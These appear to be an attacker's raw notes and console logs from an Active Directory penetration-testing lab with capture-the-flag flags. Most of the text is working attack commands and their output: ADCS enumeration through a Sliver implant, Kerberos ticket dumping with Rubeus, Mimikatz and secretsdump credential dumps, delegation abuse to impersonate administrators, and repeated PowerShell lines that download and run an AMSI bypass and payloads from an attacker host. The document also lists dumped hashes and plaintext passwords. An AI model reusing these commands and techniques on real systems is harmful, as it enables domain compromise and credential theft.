sliver (PERFECT_WHOLESALE) > sa-adcs-enum
[*] Successfully executed sa-adcs-enum (coff-loader)
[*] Got output:
[*] Found 1 CAs in the domain
[*] Listing info for CN=Cyber-CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=cyber,DC=local
Enterprise CA Name : Cyber-CA
DNS Hostname : cydc.cyber.local
Flags : SUPPORTS_NT_AUTHENTICATION CA_SERVERTYPE_ADVANCED
Expiration : 1 years
CA Cert :
Subject Name : DC=local, DC=cyber, CN=Cyber-CA
Thumbprint : 8f490e01bd7c21c2eecd0b7411b8770e6f637a0d
Serial Number : caa9e200767d06468fb5010fcd00c421
Start Date : 12/31/2019 06:41:08
End Date : 12/31/2049 06:51:08
Chain : DC=local, DC=cyber, CN=Cyber-CA
Permissions :
Owner : CYBER\Enterprise Admins
S-1-5-21-2011815209-557191040-1566801441-519
Access Rights :
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00000100
Flags : 00000001
Extended right : {0E10C968-78FB-11D2-90D4-00C04F79DC55}
Enrollment Rights
Principal : CYBER\Enterprise Admins
Access mask : 000F00FF
Flags : 00000501
Read Rights
Principal : CYBER\CYDC$
Access mask : 000F00FF
Flags : 00000501
Read Rights
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00020094
Flags : 00000101
Read Rights
Principal : CYBER\Enterprise Admins
Access mask : 000F01FF
Flags : 00000501
Extended right : {05000000-0015-0000-29DD-E977800F3621}
Read Rights
Principal : CYBER\Domain Admins
Access mask : 000F01BD
Flags : 00000501
Extended right : {05000000-0015-0000-29DD-E977800F3621}
Read Rights
[*] Found 8 templates on the ca
Template Name : CyDCAuth
Friendly Name : CyDCAuth
Template OID : 1.3.6.1.4.1.311.21.8.15649460.510131.12732088.9801446.3498531.105.91698091.91698983
Validity Period : 1 years
Renewal Period : 6 weeks
Name Flags : SUBJECT_ALT_REQUIRE_DNS
Enrollment Flags : AUTO_ENROLLMENT
Signatures Required : 0
Extended Key Usage : Smart Card Logon, Server Authentication, Client Authentication
Permissions :
Owner : CYBER\Enterprise Admins
S-1-5-21-2011815209-557191040-1566801441-519
Access Rights :
Principal : core\Domain Controllers
Access mask : 00000100
Flags : 00000001
Enrollment Rights
Principal : CYBER\Domain Controllers
Access mask : 00000100
Flags : 00000001
Enrollment Rights
Principal : CYBER\Domain Controllers
Access mask : 00000100
Flags : 00000001
Enrollment Rights
Principal : core\Domain Controllers
Access mask : 00020094
Flags : 00000501
Principal : CYBER\Domain Controllers
Access mask : 00020094
Flags : 00000501
Principal : CYBER\Domain Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00020094
Flags : 00000101
Principal : NT AUTHORITY\SYSTEM
Access mask : 000F01FF
Flags : 00000101
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Enterprise Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Domain Admins
Access mask : 000F01BD
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Template Name : CySmartCard
Friendly Name : CySmartCard
Template OID : 1.3.6.1.4.1.311.21.8.15649460.510131.12732088.9801446.3498531.105.62333380.11923608
Validity Period : 1 years
Renewal Period : 6 weeks
Name Flags : SUBJECT_REQUIRE_DIRECTORY_PATH SUBJECT_ALT_REQUIRE_UPN
Enrollment Flags : AUTO_ENROLLMENT USER_INTERACTION_REQUIRED
Signatures Required : 0
Extended Key Usage : Client Authentication, Smart Card Logon
Permissions :
Owner : CYBER\Enterprise Admins
S-1-5-21-2011815209-557191040-1566801441-519
Access Rights :
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00000100
Flags : 00000001
Enrollment Rights
Principal : CYBER\Domain Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00020094
Flags : 00000101
Principal : NT AUTHORITY\SYSTEM
Access mask : 000F01FF
Flags : 00000101
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Enterprise Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Domain Admins
Access mask : 000F01BD
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Template Name : CyberSigning
Friendly Name : CyberSigning
Template OID : 1.3.6.1.4.1.311.21.8.15649460.510131.12732088.9801446.3498531.105.3983994.3574272
Validity Period : 1 years
Renewal Period : 6 weeks
Name Flags : SUBJECT_REQUIRE_DIRECTORY_PATH SUBJECT_ALT_REQUIRE_UPN
Enrollment Flags : AUTO_ENROLLMENT
Signatures Required : 0
Extended Key Usage : Code Signing
Permissions :
Owner : CYBER\Administrator
S-1-5-21-2011815209-557191040-1566801441-500
Access Rights :
Principal : CYBER\DevOps
Access mask : 00000100
Flags : 00000001
Enrollment Rights
Principal : CYBER\Domain Admins
Access mask : 00000130
Flags : 00000001
Enrollment Rights
WriteProperty Rights
Principal : CYBER\DevOps
Access mask : 00020014
Flags : 00000501
Principal : CYBER\Domain Admins
Access mask : 000F00FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Administrator
Access mask : 000F00FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00020094
Flags : 00000101
Template Name : UserCert
Friendly Name : UserCert
Template OID : 1.3.6.1.4.1.311.21.8.15649460.510131.12732088.9801446.3498531.105.1.38
Validity Period : 1 years
Renewal Period : 6 weeks
Name Flags : SUBJECT_REQUIRE_COMMON_NAME SUBJECT_ALT_REQUIRE_UPN
Enrollment Flags : PUBLISH_TO_DS AUTO_ENROLLMENT
Signatures Required : 0
Extended Key Usage : Client Authentication
Permissions :
Owner : CYBER\Enterprise Admins
S-1-5-21-2011815209-557191040-1566801441-519
Access Rights :
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00000100
Flags : 00000001
Enrollment Rights
Principal : CYBER\Domain Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00020094
Flags : 00000101
Principal : NT AUTHORITY\SYSTEM
Access mask : 000F01FF
Flags : 00000101
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Enterprise Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Domain Admins
Access mask : 000F01BD
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Template Name : RDP
Friendly Name : RDP
Template OID : 1.3.6.1.4.1.311.21.8.15649460.510131.12732088.9801446.3498531.105.1.37
Validity Period : 2 years
Renewal Period : 6 weeks
Name Flags : SUBJECT_REQUIRE_COMMON_NAME SUBJECT_ALT_REQUIRE_DOMAIN_DNS
Enrollment Flags : PUBLISH_TO_DS
Signatures Required : 0
Extended Key Usage : 1.3.6.1.4.1.311.54.1.2
Permissions :
Owner : CYBER\Enterprise Admins
S-1-5-21-2011815209-557191040-1566801441-519
Access Rights :
Principal : CYBER\Domain Computers
Access mask : 00000100
Flags : 00000001
Enrollment Rights
Principal : CYBER\Domain Computers
Access mask : 00020094
Flags : 00000501
Principal : CYBER\Domain Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00020094
Flags : 00000101
Principal : NT AUTHORITY\SYSTEM
Access mask : 000F01FF
Flags : 00000101
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Enterprise Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Domain Admins
Access mask : 000F01BD
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Template Name : Winrm
Friendly Name : Winrm
Template OID : 1.3.6.1.4.1.311.21.8.15649460.510131.12732088.9801446.3498531.105.1.36
Validity Period : 2 years
Renewal Period : 6 weeks
Name Flags : SUBJECT_REQUIRE_COMMON_NAME SUBJECT_ALT_REQUIRE_DOMAIN_DNS
Enrollment Flags : PUBLISH_TO_DS
Signatures Required : 0
Extended Key Usage : Server Authentication
Permissions :
Owner : CYBER\Enterprise Admins
S-1-5-21-2011815209-557191040-1566801441-519
Access Rights :
Principal : CYBER\Domain Computers
Access mask : 00000100
Flags : 00000001
Enrollment Rights
Principal : CYBER\Domain Computers
Access mask : 00020094
Flags : 00000501
Principal : CYBER\Domain Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00020094
Flags : 00000101
Principal : NT AUTHORITY\SYSTEM
Access mask : 000F01FF
Flags : 00000101
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Enterprise Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Domain Admins
Access mask : 000F01BD
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Template Name : SSL
Friendly Name : SSL
Template OID : 1.3.6.1.4.1.311.21.8.15649460.510131.12732088.9801446.3498531.105.1.35
Validity Period : 2 years
Renewal Period : 6 weeks
Name Flags : ENROLLEE_SUPPLIES_SUBJECT ENROLLEE_SUPPLIES_SUBJECT_ALT_NAME
Enrollment Flags : PUBLISH_TO_DS
Signatures Required : 0
Extended Key Usage : Server Authentication
Permissions :
Owner : CYBER\Enterprise Admins
S-1-5-21-2011815209-557191040-1566801441-519
Access Rights :
Principal : CYBER\Domain Computers
Access mask : 00000100
Flags : 00000001
Enrollment Rights
Principal : CYBER\Domain Computers
Access mask : 00020094
Flags : 00000501
Principal : CYBER\Domain Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00020094
Flags : 00000101
Principal : NT AUTHORITY\SYSTEM
Access mask : 000F01FF
Flags : 00000101
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Enterprise Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Domain Admins
Access mask : 000F01BD
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Template Name : Wildcard
Friendly Name : Wildcard
Template OID : 1.3.6.1.4.1.311.21.8.15649460.510131.12732088.9801446.3498531.105.1.34
Validity Period : 2 years
Renewal Period : 6 weeks
Name Flags : ENROLLEE_SUPPLIES_SUBJECT ENROLLEE_SUPPLIES_SUBJECT_ALT_NAME
Enrollment Flags : PUBLISH_TO_DS
Signatures Required : 0
Extended Key Usage : Server Authentication
Permissions :
Owner : CYBER\Enterprise Admins
S-1-5-21-2011815209-557191040-1566801441-519
Access Rights :
Principal : CYBER\Domain Computers
Access mask : 00000100
Flags : 00000001
Enrollment Rights
Principal : CYBER\Domain Computers
Access mask : 00020094
Flags : 00000501
Principal : CYBER\Domain Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00020094
Flags : 00000101
Principal : NT AUTHORITY\SYSTEM
Access mask : 000F01FF
Flags : 00000101
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Enterprise Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Domain Admins
Access mask : 000F01BD
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
adcs_enum SUCCESS.
rubeus dump /service:krbtgt /luid:0x36e5d /nowrap
[IO.File]::WriteAllBytes("C:\Users\jay\Desktop\ilene.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
mimikatz(powershell) # lsadump::sam
Domain : COREWKT001
SysKey : 43a4388b76afc21c0178ec5745728f16
Local SID : S-1-5-21-731258190-3870040951-2229981493
SAMKey : 72dcfc9fafeb7ed4ca0771782c816f95
RID : 000001f4 (500)
User : Administrator
Hash NTLM: d0211d03f1fd91d82d9204ee109f6971
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : d10ac135ed5c8a217c0ce87ba8610f68
* Primary:Kerberos-Newer-Keys *
Default Salt : COREWKT001.CORE.CYBER.LOCALAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : cc924d3c25f10491b9ea92ccbbc4d48062253bcf2d1d44ba46e04db982cc8e24
aes128_hmac (4096) : 49bac784d925647f121b3178225e34a5
des_cbc_md5 (4096) : ced98c4a31f2eccd
OldCredentials
aes256_hmac (4096) : 30b5f96cfe2ca582f6832a1196f92b4d1cd98f30673b2498e0546ac39076ca99
aes128_hmac (4096) : 940824f8132bf1c4a4314de0a11c565b
des_cbc_md5 (4096) : 1a37ea80c201c8b5
OlderCredentials
aes256_hmac (4096) : ccc05a7a7b986981bc7bbf23bbfded2611bf4fd4a74e08860686b4454e3a6fa8
aes128_hmac (4096) : fa3dec23c1f072aabead858c53b0003c
des_cbc_md5 (4096) : b61a85ad408c4016
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : COREWKT001.CORE.CYBER.LOCALAdministrator
Credentials
des_cbc_md5 : ced98c4a31f2eccd
OldCredentials
des_cbc_md5 : 1a37ea80c201c8b5
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 954fd25162ffdda445dca6edec93b934
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 419725eb3ebd4890c94151ca44a11b9c
* Primary:Kerberos-Newer-Keys *
Default Salt : WDAGUtilityAccount
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 82f46980497223874b77b91558cbef7cbad2833e5cdf7e83c9f5979591d3f586
aes128_hmac (4096) : add8b777631fd52f26c2f525f5913fbb
des_cbc_md5 (4096) : 970be90de6e3705e
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : WDAGUtilityAccount
Credentials
des_cbc_md5 : 970be90de6e3705e
RID : 000003e9 (1001)
User : lkys37en
Hash NTLM: 9307ee5abf7791f3424d9d5148b20177
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : befff551c3b27a36f028b3d4324c2acd
* Primary:Kerberos-Newer-Keys *
Default Salt : COREWKT001.CORE.CYBER.LOCALlkys37en
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 969a3ed26fc7c004deeb883b5a68e5862fe88aa47829af131dc4636feea69b83
aes128_hmac (4096) : 9df26e35047302395b4b0197dbff8f35
des_cbc_md5 (4096) : 79fe5bd594193bfd
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : COREWKT001.CORE.CYBER.LOCALlkys37en
Credentials
des_cbc_md5 : 79fe5bd594193bfd
RID : 000003ea (1002)
User : ippsec
Hash NTLM: 58a478135a93ac3bf058a5ea0e8fdb71
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 81b8c0d7559f98fcec93bff2514c07aa
* Primary:Kerberos-Newer-Keys *
Default Salt : COREWKT001.CORE.CYBER.LOCALippsec
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 4be9e47ecdac8c8bb62ef31fb4d57a5c884c37dc52b83030fb37a5e258fe3ee4
aes128_hmac (4096) : 6aaf293504a6c928e5978c9ddd8c566a
des_cbc_md5 (4096) : 4f2c5bab15ec6291
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : COREWKT001.CORE.CYBER.LOCALippsec
Credentials
des_cbc_md5 : 4f2c5bab15ec6291
iex (new-object net.webclient).downloadstring("http://10.10.15.207/amsi"); iex (new-object net.webclient).downloadstring("http://10.10.15.207/test3.ps1");
iex (new-object net.webclient).downloadstring("http://10.10.15.207/amsi"); iex (new-object net.webclient).downloadstring("http://10.10.15.207/rub.ps1");
Invoke-Rubeus -Command 'tgtdeleg /service:krbtgt luid:0x36e5d /nowrap'
Invoke-Rubeus -Command 'triage'
Invoke-Rubeus -Command 'tgtdeleg /service:krbtgt /nowrap'
./rubeustoccache.py <BASE64_TICKET> ilene1.kribi ilene1.ccache
ticketConverter.py svc_apache.kirbi svc_apache.ccache
export KRB5CCNAME=ilene1.ccache
cme smb 10.9.15.10 -u 'ilene.rasch' --use-kcache
rbcd.py -delegate-from COREWKT001$ -delegate-to COREWKT002$ -action 'write' 'core.cyber.local/ilene.rasch' -k -no-pass
getST.py -spn 'cifs/M3DC.m3c.local' -impersonate 'Norma.branham' 'm3c.local/svc_apache' -k -no-pass
export KRB5CCNAME=Norma.branham.ccache
cme smb 10.9.20.10 -u norma.branham --use-kcache --ntds
Invoke-Rubeus -Command 's4u /impersonateuser:Administrator /msdsspn:time/m3webaw.m3c.local /user:svc_sql /altservice:http /ticket:<BASE64_TICKET> /nowrap /ptt'
┌──(myimpacket)─(jay㉿localhost)-[~/prolabs/RubeusToCcache]
└─$ rbcd.py -delegate-from 'COREWKT001$' -delegate-to 'COREWKT002$' -action 'write' 'core.cyber.local/ilene.rasch' -k -no-pass
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] COREWKT001$ can now impersonate users on COREWKT002$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] corewkt001$ (S-1-5-21-1559563558-3652093953-1250159885-1396)
iex (new-object net.webclient).downloadstring("http://10.10.15.207/amsi"); iex (new-object net.webclient).downloadstring("http://10.10.15.207/rub.ps1");
Invoke-Rubeus -Command 'tgtdeleg /service:krbtgt /nowrap'
./rubeustoccache.py <BASE64_TICKET> corewkt001.kribi corewkt001.ccache
export KRB5CCNAME=corewkt001.ccache
getST.py -spn 'cifs/COREWKT002' -impersonate 'Administrator' 'core.cyber.local/COREWKT001$' -k -no-pass
export KRB5CCNAME=Administrator.ccache
cme smb '10.9.15.201' -u Administrator --use-kcache --sam
SMB 10.9.15.201 445 COREWKT002 [*] Dumping SAM hashes
SMB 10.9.15.201 445 COREWKT002 Administrator:500:aad3b435b51404eeaad3b435b51404ee:3d369b6024558b73ce74c305f24ac984:::
SMB 10.9.15.201 445 COREWKT002 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.9.15.201 445 COREWKT002 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.9.15.201 445 COREWKT002 WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:954fd25162ffdda445dca6edec93b934:::
SMB 10.9.15.201 445 COREWKT002 [+] Added 4 SAM hashes to the database
Worked
cme smb '10.9.15.201' -u Administrator --use-kcache -x "powershell.exe -noexit -ep bypass -c IEX((New-Object System.Net.WebClient).DownloadString('http://10.10.15.207/large1.ps1'))"
(New-Object System.Net.WebClient).DownloadString('http://10.10.15.207:80/am.txt') | IEX

getsystem
Administrator:500:Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
Guest:501:Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
DefaultAccount:503:DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
WDAGUtilityAccount:504:WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
Not again steven
Cyb3rN3t1C5{CR3@t0rS!D}
Post-exp
iex (new-object net.webclient).downloadstring("http://10.10.15.207/amsi"); iex (new-object net.webclient).downloadstring("http://10.10.15.207/test3.ps1");
test-wave -Command '"token::elevate" "privilege::debug" "lsadump::secrets"'
mimikatz(powershell) # lsadump::secrets
Domain : COREWKT002
SysKey : 5dd8c2773925b89651e9f48ebdf8d46c
Local name : COREWKT002 ( S-1-5-21-2266124114-256719172-1478668774 )
Domain name : core ( S-1-5-21-1559563558-3652093953-1250159885 )
Domain FQDN : core.cyber.local
Policy subsystem is : 1.18
LSA Key(s) : 1, default {d41a4f61-828e-cd3f-4165-8f0a0473a25e}
[00] {d41a4f61-828e-cd3f-4165-8f0a0473a25e} c5f66ce25a07afd2155b7692bb7751266906233b3e1d3e674154dd9d580d0347
Secret : $MACHINE.ACC
cur/text: 0DlRYa42*7Ao)_#=FiBaj#NMD0M5;TUSB,h#[:]nk,+a/u=eTVex"Kmn"WTz0d*,l"r9wetIka%lej(6jSWbJJu*VlhJW[bCX .T^/a;WxB9D;^9HbQgu^wn
NTLM:99f7ed190a27e3963249b3e0e14c3194
SHA1:69bd6440eb8dc905ffd4f6c382968f284489e787
old/text: 0DlRYa42*7Ao)_#=FiBaj#NMD0M5;TUSB,h#[:]nk,+a/u=eTVex"Kmn"WTz0d*,l"r9wetIka%lej(6jSWbJJu*VlhJW[bCX .T^/a;WxB9D;^9HbQgu^wn
NTLM:99f7ed190a27e3963249b3e0e14c3194
SHA1:69bd6440eb8dc905ffd4f6c382968f284489e787
Secret : CachedDefaultPassword
old/text: 6IVx7cxECM6m57WVjrqfH1gvluKnvN
Secret : DefaultPassword
cur/text: zui4uaS8oeng
test-wave -Command '"token::elevate" "privilege::debug" "lsadump::sam"'
mimikatz(powershell) # lsadump::sam
Domain : COREWKT002
SysKey : 5dd8c2773925b89651e9f48ebdf8d46c
Local SID : S-1-5-21-2266124114-256719172-1478668774
SAMKey : bd2bb9c4a2aff5c6874f16c8ef83fcd7
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 3d369b6024558b73ce74c305f24ac984
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 81c53c6ef5fbebe3e9cb1324ed9d6aa4
* Primary:Kerberos-Newer-Keys *
Default Salt : COREWKT002.CORE.CYBER.LOCALAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 001ff6d7bc10726a07cda615785fd4ec7f9b88d2f642539863ca823e99c1cd75
aes128_hmac (4096) : 12b60ce38236dece8e6abe1726085fd4
des_cbc_md5 (4096) : b53bfb687acebaf4
OldCredentials
aes256_hmac (4096) : c168b8fa882a3ed251a468998cca52994124a40117fbe5c1196c6754e47bbf10
aes128_hmac (4096) : 4c062b8eeb24fcfeec7c43fa1b8c81a0
des_cbc_md5 (4096) : 6ddf08ab1340926b
OlderCredentials
aes256_hmac (4096) : 6e5bcdb4a3141e96a94987367aef6166233bd9b146896e0b77c26e5c190496b2
aes128_hmac (4096) : bdf73a8d963578dd5431e955067439e3
des_cbc_md5 (4096) : 802962c21f51cdc7
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : COREWKT002.CORE.CYBER.LOCALAdministrator
Credentials
des_cbc_md5 : b53bfb687acebaf4
OldCredentials
des_cbc_md5 : 6ddf08ab1340926b
test-wave -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"'
After checking all the IPs, this is the interesting one:
cme smb 10.9.10.18 -u 'steven.sanchez' -p 'zui4uaS8oeng' -d core.cyber.local
smbclient.py 'core.cyber.local/steven.sanchez:zui4uaS8oeng@10.9.10.18'
use C$
cd Users
# cat flag.txt
Cyb3rN3t1C5{RD$_U$3r_$h3ll}
The Great Escape
cd Users\Administrator
cat flag.txt
Cyb3rN3t1C5{RD$_App$_Br3ak0ut$}
Out of Control
secretsdump.py 'core.cyber.local/steven.sanchez:zui4uaS8oeng@10.9.10.18'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x0532f61bcad8090e9a8d4600fb26d83b
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2567ea2192cc2288bebe0f13565252b8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:86326d3ce61a1321d2dbcfdf8a068073:::
[*] Dumping cached domain logon information (domain/username:hash)
CYBER.LOCAL/Administrator:$DCC2$10240#Administrator#c145dcbd844f88264bdd35aafd17500f
CORE.CYBER.LOCAL/George.Wirth:$DCC2$10240#George.Wirth#b4357cc36acd90e5bdc6a185b0ad9289
CORE.CYBER.LOCAL/Steven.Sanchez:$DCC2$10240#Steven.Sanchez#25f4b45a2fb7112ce6cd5d12dccabbc4
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
CYBER\CYAPP$:aes256-cts-hmac-sha1-96:2db070d2cbde140fdc612b267727c96ee0fc1b6e0ee2bf7aa13afbfd0af60d24
CYBER\CYAPP$:aes128-cts-hmac-sha1-96:2c9c0d26bae1353572ccd887bed4ec0a
CYBER\CYAPP$:des-cbc-md5:97d5f41f700e43c1
CYBER\CYAPP$:plain_password_hex:24003b00370023006b0038005d002e0065003a006f005b0041005800320056006e0073004b007000330027003c004e0042005a006400430020002e0040007500530030007100510062006900670048002d0075003c006a0024006d002000790075002c007a0032002a005f0024005d003200780059006800770048006a0058005200700053005b004100620030003a005b00560044007a006b0046004100660058006e00420058005000230034007300470071006100780040006300410047002000530020006100540031004300490043002000490044004a0069003e0042005d00380056006b00490037005a002200
CYBER\CYAPP$:aad3b435b51404eeaad3b435b51404ee:f787cd99b54ab0d05cbba3624199abd0:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x8913f82198236b0a6e4e6bcdb8893c178ea75e8e
dpapi_userkey:0xb6cfc82ef9a565ec90399c92a31caf6303d41ac2
[*] NL$KM
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Corewebtw
cme winrm 10.9.15.0/24 -u 'steven.sanchez' -p 'zui4uaS8oeng'
evil-winrm -i 10.9.15.12 -u 'steven.sanchez' -p 'zui4uaS8oeng'
(New-Object System.Net.WebClient).DownloadString('http://10.10.15.207:80/am.txt') | IEX


<user username="tomcat" password="y4mEcAmk!%9j" roles="manager-gui" />
Now the Tomcat exploit with Juicy Potato to get the Curiosity flag in C:\Users\Administrator\flag.txt